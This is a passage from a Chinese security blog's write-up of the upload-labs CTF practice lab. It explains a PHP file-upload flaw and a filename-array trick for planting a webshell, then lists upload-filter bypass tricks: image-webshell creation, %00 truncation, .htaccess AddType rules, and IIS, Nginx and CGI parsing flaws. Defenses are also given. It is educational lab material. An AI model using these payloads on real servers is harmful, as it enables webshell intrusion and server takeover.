class="string">&#x27;name&#x27;</span>] : $_POST[<span class="string">&#x27;save_name&#x27;</span>];</span><br><span class="line">        <span class="keyword">if</span> (!is_array($file)) &#123;</span><br><span class="line">            $file = explode(<span class="string">&#x27;.&#x27;</span>, strtolower($file));</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        $ext = end($file);</span><br><span class="line">        $allow_suffix = <span class="keyword">array</span>(<span class="string">&#x27;jpg&#x27;</span>,<span class="string">&#x27;png&#x27;</span>,<span class="string">&#x27;gif&#x27;</span>);</span><br><span class="line">        <span class="keyword">if</span> (!in_array($ext, $allow_suffix)) &#123;</span><br><span class="line">            $msg = <span class="string">&quot;禁止上传该后缀文件!&quot;</span>;</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            $file_name = reset($file) . <span class="string">&#x27;.&#x27;</span> . $file[count($file) - <span class="number">1</span>];</span><br><span class="line">            $temp_file = $_FILES[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>];</span><br><span class="line">            $img_path = UPLOAD_PATH . <span class="string">&#x27;/&#x27;</span> .$file_name;</span><br><span class="line">            <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) &#123;</span><br><span class="line">                $msg = <span class="string">&quot;文件上传成功！&quot;</span>;</span><br><span class="line">                $is_upload = <span class="literal">true</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                $msg = <span class="string">&quot;文件上传失败！&quot;</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    $msg = <span class="string">&quot;请选择要上传的文件！&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>首先看第一个判断：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$allow_type = <span class="keyword">array</span>(<span class="string">&#x27;image/jpeg&#x27;</span>,<span class="string">&#x27;image/png&#x27;</span>,<span class="string">&#x27;image/gif&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!in_array($_FILES[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;type&#x27;</span>],$allow_type))&#123;</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&quot;&lt;script&gt;black();&lt;/script&gt;&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>所以必须保证我们上传的表单 MIME 类型一定要符合标准。</p>
<p>接着对我们提交的 sava_name 的字符串进行处理，如果不是数组的话就以 <code>.</code>为分隔，打散为数组：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$file = <span class="keyword">empty</span>($_POST[<span class="string">&#x27;save_name&#x27;</span>]) ? $_FILES[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>] : $_POST[<span class="string">&#x27;save_name&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!is_array($file)) &#123;</span><br><span class="line">  $file = explode(<span class="string">&#x27;.&#x27;</span>, strtolower($file));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>如果是<strong>数组的话就无需打散</strong>，这里比较关键，后面再详细说，先记着。</p>
<p>因为打散后会校验最后的后缀：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$ext = end($file);</span><br><span class="line">$allow_suffix = <span class="keyword">array</span>(<span class="string">&#x27;jpg&#x27;</span>,<span class="string">&#x27;png&#x27;</span>,<span class="string">&#x27;gif&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!in_array($ext, $allow_suffix)) &#123;</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&quot;&lt;script&gt;black();&lt;/script&gt;&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>如果不是合法后缀的话直接就报错了，所以我们老老实实的传入合法的字符串类型的不行的，这里的传入一个数组。比如这样的数组：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$file = [<span class="number">0</span>=&gt;<span class="string">&#x27;shell.php/&#x27;</span>, <span class="number">2</span>=&gt;<span class="string">&#x27;png&#x27;</span>]</span><br></pre></td></tr></table></figure>

<p>这样执行完最后的拼接文件名的代码后：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$file_name = reset($file) . <span class="string">&#x27;.&#x27;</span> . $file[count($file) - <span class="number">1</span>];</span><br><span class="line">$file_name = <span class="string">&#x27;shell.php/&#x27;</span> . <span class="string">&#x27;.&#x27;</span> . $file[<span class="number">2</span> - <span class="number">1</span>]; = <span class="string">&#x27;shell.php/&#x27;</span>.<span class="string">&#x27;&#x27;</span> = <span class="string">&#x27;shell.php/.&#x27;</span></span><br></pre></td></tr></table></figure>

<p>这样最后一步：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">move_uploaded_file($temp_file, $img_path)</span><br><span class="line">move_uploaded_file($temp_file, <span class="string">&#x27;xx/xx/shell/php/.&#x27;</span>)  </span><br></pre></td></tr></table></figure>

<p>结合前面的 move_uploaded_file 函数缺陷，会忽略掉文件末尾的 <code>/.</code>，所以最终就可以成功将 webshell 上传。</p>
<h2 id="Bypass-12"><a href="#Bypass-12" class="headerlink" title="Bypass"></a>Bypass</h2><p>抓包构造数据包：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204171909.png" alt="image-20201204171908967"></p>
<p>上传成功：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204172027.png" alt="image-20201204172027238"></p>
<hr>
<h1 id="文件上传漏洞"><a href="#文件上传漏洞" class="headerlink" title="文件上传漏洞"></a>文件上传漏洞</h1><p> <strong>文件上传，顾名思义就是上传文件的功能行为，之所以会被发展为危害严重的漏洞，是程序没有对访客提交的数据进行检验或者过滤不严，可以直接提交修改过的数据绕过扩展名的检验。文件上传漏洞是漏洞中最为简单猖獗的利用形式，一般只要能上传获取地址，可执行文件被解析就可以获取系统WebShell。</strong></p>
<h2 id="本质"><a href="#本质" class="headerlink" title="本质"></a>本质</h2><p><strong>上传文件时，如果服务端代码没有对客户端上传的文件进行严格的验证和过滤， 就容易造成可以上传任意文件的情况，包括上传脚本文件(asp、aspx、php、jsp等格式的文件)。</strong></p>
<h2 id="条件"><a href="#条件" class="headerlink" title="条件"></a>条件</h2><ul>
<li><strong>首先，上传的文件能够被 Web 容器解释执行。所以文件上传后所在的目录要是 Web 容器所覆盖到的路径。</strong></li>
<li><strong>其次，用户能够从 Web 上访问这个文件。如果文件上传了，但用户无法通过 Web 访问，或者无法使得 Web容器解释这个脚本，那么也不能称之为漏洞。</strong></li>
<li><strong>最后，用户上传的文件若被安全检查、格式化、图片压缩等功能改变了内容，则也可能导致攻击不成功。</strong></li>
</ul>
<h2 id="危害"><a href="#危害" class="headerlink" title="危害"></a>危害</h2><p><strong>上传WebShell 控制整个网站，甚至控制服务器</strong></p>
<h2 id="防御方法"><a href="#防御方法" class="headerlink" title="防御方法"></a>防御方法</h2><p><strong>1、严格规范文件上传处理逻辑设计，不建议先存储后判断的方式，以免引起条件竞争类漏洞。</strong><br><strong>2、严格检查上传的文件后缀名、Content-Type、文件内容等。</strong><br><strong>3、定时修复服务器端的解析类漏洞，以及文件包含类漏洞避免漏洞组合。</strong></p>
<h2 id="ByPass-技巧"><a href="#ByPass-技巧" class="headerlink" title="ByPass 技巧"></a>ByPass 技巧</h2><h3 id="1-客户端校验绕过"><a href="#1-客户端校验绕过" class="headerlink" title="1.客户端校验绕过"></a>1.客户端校验绕过</h3><ul>
<li>直接修改 js 代码或者使用抓包的方法修改请求内容绕过，可以先上传一个gif木马，通过抓包修改为 jsp/php/asp。</li>
<li>关闭 js 尝试绕过</li>
</ul>
<h3 id="2-服务端绕过"><a href="#2-服务端绕过" class="headerlink" title="2.服务端绕过"></a>2.服务端绕过</h3><ul>
<li>通过抓包来修改Http头的content-type绕过</li>
<li>图片马：<code>copy pic.jpg/b+shell.php/a shell.jpg</code></li>
</ul>
<h3 id="3-黑名单绕过"><a href="#3-黑名单绕过" class="headerlink" title="3.黑名单绕过"></a>3.黑名单绕过</h3><ul>
<li>将后缀改为<code>php.</code>  <code>php_</code>  <code>php4</code> <code>phptml</code> <code>php空格</code> 再上传</li>
<li>使用<code>%00</code>截断：<code>/var/www/html/upload/shell.php%00 shell.png </code> </li>
<li>双写绕过：上传的文件名为<code>shell.pphphp</code>，那么被替换之后就为<code>shell.php</code></li>
</ul>
<h3 id="4-htaccess文件绕过"><a href="#4-htaccess文件绕过" class="headerlink" title="4.htaccess文件绕过"></a>4.htaccess文件绕过</h3><ul>
<li>先上传一个名为<code>.htaccess</code>的文件，内容为：<code>AddType application/x-httpd-php .png</code></li>
<li>让 png 后缀的文件当做 PHP 来解析</li>
</ul>
<h2 id="IIS6-0解析漏洞"><a href="#IIS6-0解析漏洞" class="headerlink" title="IIS6.0解析漏洞"></a>IIS6.0解析漏洞</h2><ol>
<li><p><strong>IIS6.0除了将ASP后缀当做ASP进行解析的同时，当文件后缀名字为.asa .cer .cdx 也会当做asp去解析，这是因为IIS6.0在应用程序扩展中默认设置了.asa .cer .cdx 都会调用 asp.dll</strong></p>
</li>
<li><p><strong>很多地方都会用到“;”，作用是结束，IIS6.0在这就是一个漏洞了。例如：上传a.asp;jpg，服务器就会将它作为asp去执行，但是这个文件的名称依旧是：a.asp;jpg，只是在执行的过程中，web容器解析的锅</strong></p>
</li>
<li><p><strong>另一种解析漏洞就是“/”，例如：命名为 <code>a.asp/123.jpg</code>，简单的说这相当于构建了一个新的文件夹<code>a.asp</code>，凡是这个里的文件都会以asp去执行（&lt;7.5都有）</strong></p>
</li>
</ol>
<h2 id="Nginx-解析漏洞"><a href="#Nginx-解析漏洞" class="headerlink" title="Nginx 解析漏洞"></a>Nginx 解析漏洞</h2><p><strong>Nginx &lt;=0.8.37</strong></p>
<p>在Fast-CGI关闭的情况下，Nginx &lt;=0.8.37 依然存在解析漏洞</p>
<p>在一个文件路径(/xx.jpg)后面加上.php会将 /xx.jpg.php 解析为 php 文件。</p>
<p>（站长评论：从 /test.jpg/x.php 演变过来的，具体可以参考：Ngnix 空字节可远程执行代码漏洞）</p>
<h2 id="CGI解析漏洞"><a href="#CGI解析漏洞" class="headerlink" title="CGI解析漏洞"></a>CGI解析漏洞</h2><p>CGI简单的说，可以理解为是web服务器和独立程序之间的管家：服务器将a类型文件，交给CGI，CGI交给处理a类型文件的程序。</p>
<h3 id="过程："><a href="#过程：" class="headerlink" title="过程："></a>过程：</h3><ol>
<li><strong>上传图片马，不用改变图片马的名称，假如上传<code>1.jpg</code></strong></li>
<li><strong>访问图片马文件位置，比如<code>www.aaa.com/bbb/ccc/1.jpg</code></strong></li>
<li><strong>在文件路径补充：“/.php”，即<code>www.aaa.com/bbb/ccc/1.jpg/.php</code></strong></li>
<li><strong>访问该路径验证：<code>www.aaa.com/bbb/ccc/1.jpg/.php=phpinfo();</code></strong></li>
</ol>
<h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p><strong>CGI一看是php后缀结尾，便给php程序去执行，php去找名字为“ 1.jpg”的文件夹，没找到，便去找“1.jpg”的文件，找到后执行。</strong></p>
<p><strong>漏洞本质：少了在次检测的环节。</strong></p>
<hr>
<h1 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h1><p><strong>国光的保姆级 WriteUp：</strong></p>
<p><strong><a target="_blank" rel="noopener" href="https://github.com/sqlsec/upload-labs-docker/blob/main/WP.md">https://github.com/sqlsec/upload-labs-docker/blob/main/WP.md</a></strong></p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">离沫凌天๓</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://www.lintstar.top/2020/12/612c8edf.html">https://www.lintstar.top/2020/12/612c8edf.html</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://www.lintstar.top" target="_blank">离沫凌天๓</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/Upload/">Upload</a><a class="post-meta__tags" href="/tags/Vulnerability/">Vulnerability</a><a class="post-meta__tags" href="/tags/Docker/">Docker</a><a class="post-meta__tags" href="/tags/CTF/">CTF</a></div><div class="post_share"><div class="social-share" data-image="https://img.lintstar.top/hexo/20201204184628.webp" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2020/12/784edd2e.html"><img class="prev-cover" data-lazy-src="https://img.lintstar.top/hexo/20201221222226.webp" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">蓝帽杯决赛 WRITEUP</div></div></a></div><div class="next-post pull-right"><a href="/2020/11/560e14cb.html"><img class="next-cover" data-lazy-src="https://img.lintstar.top/hexo/20201129160207.webp" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">Github Action 实现自动升级 Bilibili Lv6</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span> 相关推荐</span></div><div class="relatedPosts-list"><div><a target="_blank" rel="noopener" href="//2021/01/d0e169c6.html" title="Redis GetShell 姿势总结"><img class="cover" data-lazy-src="https://img.lintstar.top/hexo/20210103223850.webp" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-01-02</div><div class="title">Redis GetShell 姿势总结</div></div></a></div><div><a target="_blank" rel="noopener" href="//2021/01/9072ee96.html" title="子域名接管"><img class="cover" data-lazy-src="https://img.lintstar.top/hexo/20210201132431.webp" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-01-25</div><div class="title">子域名接管</div></div></a></div><div><a target="_blank" rel="noopener" href="//2021/01/a3a6c3e5.html" title="JumpServer RCE 漏洞复现"><img class="cover" data-lazy-src="https://img.lintstar.top/hexo/20210201132315.webp" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-01-31</div><div class="title">JumpServer RCE 漏洞复现</div></div></a></div></div></div><hr/><div id="post-comment"><div class="comment-head"><div class="comment-headline"><i class="fas fa-comments fa-fw"></i><span> 评论</span></div></div><div class="comment-wrap"><div><div class="vcomment" id="vcomment"></div></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="card-info-avatar is-center"><img class="avatar-img" data-lazy-src="/plogo/Alogo.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/><div class="author-info__name">离沫凌天๓</div><div class="author-info__description">花开花落 一路上起起跌跌</div></div><div class="card-info-data"><div class="card-info-data-item is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">26</div></a></div><div class="card-info-data-item is-center"><a href="/tags/"><div class="headline">标签</div><div class="length-num">44</div></a></div><div class="card-info-data-item is-center"><a href="/categories/"><div class="headline">分类</div><div class="length-num">6</div></a></div></div><a class="button--animated" id="card-info-btn" href="/message/"><i class="fas fa-star"></i><span>With Me</span></a><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="mailto:admin@lintstar.top" target="_blank" title="Email"><i class="fas fa-envelope"></i></a><a class="social-icon" href="/atom.xml" target="_blank" title="Rss"><i class="fas fa-rss"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn card-announcement-animation"></i><span>公告</span></div><div class="announcement_content">" 我顶着大太阳 只想为你撑伞 "</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%89%8B%E5%86%8C"><span class="toc-number">2.</span> <span class="toc-text">手册</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%90%AD%E5%BB%BA%E7%8E%AF%E5%A2%83"><span class="toc-number">3.</span> <span class="toc-text">搭建环境</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#30001-JavaScript-%E7%BB%95%E8%BF%87"><span class="toc-number">4.</span> <span class="toc-text">30001 -  JavaScript 绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AC%E5%85%B3%E7%89%B9%E5%BE%81"><span class="toc-number">4.1.</span> <span class="toc-text">本关特征</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bypass"><span class="toc-number">4.2.</span> <span class="toc-text">Bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B0%83%E8%AF%95-js"><span class="toc-number">4.2.1.</span> <span class="toc-text">调试 js</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%A6%81%E7%94%A8-js"><span class="toc-number">4.2.2.</span> <span class="toc-text">禁用 js</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8A%93%E5%8C%85"><span class="toc-number">4.2.3.</span> <span class="toc-text">抓包</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#30002-htaccess-%E8%A7%A3%E6%9E%90%E8%A7%84%E5%88%99%E7%BB%95%E8%BF%87"><span class="toc-number">5.</span> <span class="toc-text">30002 - htaccess 解析规则绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AC%E5%85%B3%E7%89%B9%E5%BE%81-1"><span class="toc-number">5.1.</span> <span class="toc-text">本关特征</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bypass-1"><span class="toc-number">5.2.</span> <span class="toc-text">Bypass</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#30003-MIME-%E7%BB%95%E8%BF%87"><span class="toc-number">6.</span> <span class="toc-text">30003 - MIME 绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AC%E5%85%B3%E7%89%B9%E5%BE%81-2"><span class="toc-number">6.1.</span> <span class="toc-text">本关特征</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bypass-2"><span class="toc-number">6.2.</span> <span class="toc-text">Bypass</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#30004-%E6%96%87%E4%BB%B6%E5%A4%B4%E7%BB%95%E8%BF%87"><span class="toc-number">7.</span> <span class="toc-text">30004 - 文件头绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AC%E5%85%B3%E7%89%B9%E5%BE%81-3"><span class="toc-number">7.1.</span> <span class="toc-text">本关特征</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bypass-3"><span class="toc-number">7.2.</span> <span class="toc-text">Bypass</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#30005-%E5%8F%8C%E5%86%99%E7%BB%95%E8%BF%87"><span class="toc-number">8.</span> <span class="toc-text">30005 - 双写绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AC%E5%85%B3%E7%89%B9%E5%BE%81-4"><span class="toc-number">8.1.</span> <span class="toc-text">本关特征</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bypass-4"><span class="toc-number">8.2.</span> <span class="toc-text">Bypass</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#30006-%E5%A4%A7%E5%B0%8F%E5%86%99%E7%BB%95%E8%BF%87"><span class="toc-number">9.</span> <span class="toc-text">30006 - 大小写绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AC%E5%85%B3%E7%89%B9%E5%BE%81-5"><span class="toc-number">9.1.</span> <span class="toc-text">本关特征</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bypass-5"><span class="toc-number">9.2.</span> <span class="toc-text">Bypass</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#30007-GET-%E5%9E%8B-00-%E6%88%AA%E6%96%AD%E7%BB%95%E8%BF%87"><span class="toc-number">10.</span> <span class="toc-text">30007 - GET 型 %00 截断绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AC%E5%85%B3%E7%89%B9%E5%BE%81-6"><span class="toc-number">10.1.</span> <span class="toc-text">本关特征</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bypass-6"><span class="toc-number">10.2.</span> <span class="toc-text">Bypass</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#30008-POST-%E5%9E%8B-00-%E6%88%AA%E6%96%AD%E7%BB%95%E8%BF%87"><span class="toc-number">11.</span> <span class="toc-text">30008 - POST 型 %00 截断绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AC%E5%85%B3%E7%89%B9%E5%BE%81-7"><span class="toc-number">11.1.</span> <span class="toc-text">本关特征</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bypass-7"><span class="toc-number">11.2.</span> <span class="toc-text">Bypass</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#30009-%E9%BB%91%E5%90%8D%E5%8D%95%E7%BB%95%E8%BF%87"><span class="toc-number">12.</span> <span class="toc-text">30009 - 黑名单绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AC%E5%85%B3%E7%89%B9%E5%BE%81-8"><span class="toc-number">12.1.</span> <span class="toc-text">本关特征</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bypass-8"><span class="toc-number">12.2.</span> <span class="toc-text">Bypass</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#30010-%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89%E7%BB%95%E8%BF%87"><span class="toc-number">13.</span> <span class="toc-text">30010 - 条件竞争绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AC%E5%85%B3%E7%89%B9%E5%BE%81-9"><span class="toc-number">13.1.</span> <span class="toc-text">本关特征</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bypass-9"><span class="toc-number">13.2.</span> <span class="toc-text">Bypass</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#30011-%E4%BA%8C%E6%AC%A1%E6%B8%B2%E6%9F%93%E7%BB%95%E8%BF%87"><span class="toc-number">14.</span> <span class="toc-text">30011 - 二次渲染绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AC%E5%85%B3%E7%89%B9%E5%BE%81-10"><span class="toc-number">14.1.</span> <span class="toc-text">本关特征</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bypass-10"><span class="toc-number">14.2.</span> <span class="toc-text">Bypass</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#GIF"><span class="toc-number">14.3.</span> <span class="toc-text">GIF</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PNG"><span class="toc-number">14.4.</span> <span class="toc-text">PNG</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%86%99%E5%85%A5-PLTE-%E6%95%B0%E6%8D%AE%E5%9D%97"><span class="toc-number">14.4.1.</span> <span class="toc-text">写入 PLTE 数据块</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%86%99%E5%85%A5IDAT%E6%95%B0%E6%8D%AE%E5%9D%97"><span class="toc-number">14.4.2.</span> <span class="toc-text">写入IDAT数据块</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#JPG"><span class="toc-number">14.5.</span> <span class="toc-text">JPG</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#30012-move-uploaded-file-%E7%BB%95%E8%BF%87"><span class="toc-number">15.</span> <span class="toc-text">30012 - move_uploaded_file 绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AC%E5%85%B3%E7%89%B9%E5%BE%81-11"><span class="toc-number">15.1.</span> <span class="toc-text">本关特征</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bypass-11"><span class="toc-number">15.2.</span> <span class="toc-text">Bypass</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#30013-%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E7%BB%95%E8%BF%87"><span class="toc-number">16.</span> <span class="toc-text">30013 - 代码审计绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AC%E5%85%B3%E7%89%B9%E5%BE%81-12"><span class="toc-number">16.1.</span> <span class="toc-text">本关特征</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bypass-12"><span class="toc-number">16.2.</span> <span class="toc-text">Bypass</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E"><span class="toc-number">17.</span> <span class="toc-text">文件上传漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AC%E8%B4%A8"><span class="toc-number">17.1.</span> <span class="toc-text">本质</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9D%A1%E4%BB%B6"><span class="toc-number">17.2.</span> <span class="toc-text">条件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8D%B1%E5%AE%B3"><span class="toc-number">17.3.</span> <span class="toc-text">危害</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%98%B2%E5%BE%A1%E6%96%B9%E6%B3%95"><span class="toc-number">17.4.</span> <span class="toc-text">防御方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ByPass-%E6%8A%80%E5%B7%A7"><span class="toc-number">17.5.</span> <span class="toc-text">ByPass 技巧</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%AE%A2%E6%88%B7%E7%AB%AF%E6%A0%A1%E9%AA%8C%E7%BB%95%E8%BF%87"><span class="toc-number">17.5.1.</span> <span class="toc-text">1.客户端校验绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E6%9C%8D%E5%8A%A1%E7%AB%AF%E7%BB%95%E8%BF%87"><span class="toc-number">17.5.2.</span> <span class="toc-text">2.服务端绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E9%BB%91%E5%90%8D%E5%8D%95%E7%BB%95%E8%BF%87"><span class="toc-number">17.5.3.</span> <span class="toc-text">3.黑名单绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-htaccess%E6%96%87%E4%BB%B6%E7%BB%95%E8%BF%87"><span class="toc-number">17.5.4.</span> <span class="toc-text">4.htaccess文件绕过</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#IIS6-0%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="toc-number">17.6.</span> <span class="toc-text">IIS6.0解析漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Nginx-%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="toc-number">17.7.</span> <span class="toc-text">Nginx 解析漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CGI%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="toc-number">17.8.</span> <span class="toc-text">CGI解析漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%87%E7%A8%8B%EF%BC%9A"><span class="toc-number">17.8.1.</span> <span class="toc-text">过程：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-number">17.8.2.</span> <span class="toc-text">原理</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E8%B5%84%E6%96%99"><span 